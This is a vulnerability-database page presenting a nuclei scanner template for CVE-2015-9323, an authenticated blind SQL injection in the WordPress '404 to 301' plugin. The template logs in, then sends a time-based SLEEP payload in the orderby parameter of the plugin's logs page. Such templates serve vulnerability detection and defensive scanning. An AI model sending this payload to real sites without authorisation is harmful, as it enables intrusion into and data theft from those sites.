Lucene search
K

404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection

🗓️ 17 Jun 2026 05:14:44Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

The 404 to 301 WordPress plugin <= 2.0.2 has an Authenticated Blind SQL Injection, impacting data and site security

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Wordpress 404 to 301 2.0.2 Plugin - SQL Injection (Authenticated) Exploit
2 Feb 202200:00
zdt
CNVD
WordPress 404-to-301 Plugin SQL Injection Vulnerability
20 Aug 201900:00
cnvd
CVE
CVE-2015-9323
16 Aug 201920:12
cve
Cvelist
CVE-2015-9323
16 Aug 201920:12
cvelist
Exploit DB
Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
2 Feb 202200:00
exploitdb
NVD
CVE-2015-9323
16 Aug 201921:15
nvd
Packet Storm
WordPress 404 To 301 2.0.2 SQL Injection
2 Feb 202200:00
packetstorm
Prion
Sql injection
16 Aug 201921:15
prion
RedhatCVE
CVE-2015-9323
22 May 202509:20
redhatcve
WPVulnDB
404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection
22 Nov 201500:00
wpvulndb
Rows per page
id: CVE-2015-9323

info:
  name: 404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection
  author: Harsh
  severity: critical
  description: |
    The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or potential compromise of the WordPress site.
  remediation: Fixed in version 2.0.3
  reference:
    - https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9
    - http://cinu.pl/research/wp-plugins/mail_e28f19a8f03f0517f94cb9fea15d8525.html
    - https://wordpress.org/plugins/404-to-301/#developers
    - https://github.com/Enes4xd/Enes4xd
    - https://github.com/Hacker5preme/Exploits
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2015-9323
    cwe-id: CWE-89
    epss-score: 0.46125
    epss-percentile: 0.98653
    cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: duckdev
    product: 404_to_301
    framework: wordpress
  tags: time-based-sqli,cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 15s
        GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(7))XXX)--+- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "404-to-301")'
        condition: and
# digest: 490a0046304402204e99220bed35fddfc816b198c904ed7f716dd08385c156dc0ecd1ecbc7dcc67002205bb6422bf020a1d42652d8aa7ce7fae6ca35552845f594ca94c8d5f341e95379:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.8High risk
Vulners AI Score8.8
CVSS 27.5
CVSS 3.19.8
EPSS0.46125
18